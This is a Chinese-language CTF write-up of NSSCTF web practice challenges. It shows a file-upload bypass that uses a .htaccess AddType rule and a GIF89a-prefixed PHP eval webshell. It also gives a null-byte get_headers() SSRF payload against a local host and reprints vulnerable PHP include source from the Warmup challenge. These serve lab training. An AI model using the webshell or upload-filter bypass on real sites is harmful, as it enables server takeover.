NSSCTF之Web篇刷题记录(13)

news/2024/11/25 7:47:08/

NSSCTF之Web篇刷题记录[12]

- [GXYCTF 2019]BabyUpload：
- [GKCTF 2020]cve版签到：
- [HCTF 2018]Warmup：
- [GDOUCTF 2023]泄露的伪装：
- [羊城杯 2020]easycon：
- [HNCTF 2022 Week1]Interesting_include：

NSSCTF平台：https://www.nssctf.cn/
PS：记得所有的flag都改为NSSCTF

[GXYCTF 2019]BabyUpload：

在这里插入图片描述

先传了一个一句话木马然后过滤了上传一个.htaccess文件 AddType application/x-httpd-php .jpeg（将.jpeg文件解析为php文件）

在这里插入图片描述

在这里插入图片描述
这里我们可以解析jpeg后继续上传一个一句话木马的jpeg 但是这里还有过滤（诶，别蒙我啊，这标志明显还是php啊）修改为：

GIF89a  
<script language="php">eval($_POST['cmd']);</script>

在这里插入图片描述

然后蚁🗡连接在根目录下看到flag。

在这里插入图片描述

NSSCTF{13452adb-4b78-4942-bdea-9f90c17d4507}

[GKCTF 2020]cve版签到：

在这里插入图片描述
PHP 7.2.29之前的7.2.x版本、7.3.16之前的7.3.x版本和7.4.4之前的7.4.x版本中的get_headers()函数存在安全漏洞（\0可以截断)。攻击者可利用该漏洞造成信息泄露

使用%00截断说我们url请求必须包含.ctfhub.com F12 提示flag在本地，还告诉了我们主机名必须以123结尾

在这里插入图片描述
Payload：?url=http://127.0.0.123%00www.ctfhub.com

在这里插入图片描述

NSSCTF{80f1e680-dcd3-407f-b001-fe43442fed83}

[HCTF 2018]Warmup：

在这里插入图片描述

<?phphighlight_file(__FILE__);class emmm{public static function checkFile(&$page){$whitelist = ["source"=>"source.php","hint"=>"hint.php"];if (! isset($page) || !is_string($page)) {echo "you can't see it";return false;}if (in_array($page, $whitelist)) {return true;}$_page = mb_substr($page,0,mb_strpos($page . '?', '?'));if (in_array($_page, $whitelist)) {return true;}$_page = urldecode($page);$_page = mb_substr($_page,0,mb_strpos($_page . '?', '?'));if (in_array($_page, $whitelist)) {return true;}echo "you can't see it";return false;}}if (! empty($_REQUEST['file'])&& is_string($_REQUEST['file'])&& emmm::checkFile($_REQUEST['file'])) {include $_REQUEST['file'];exit;} else {echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";}  
?>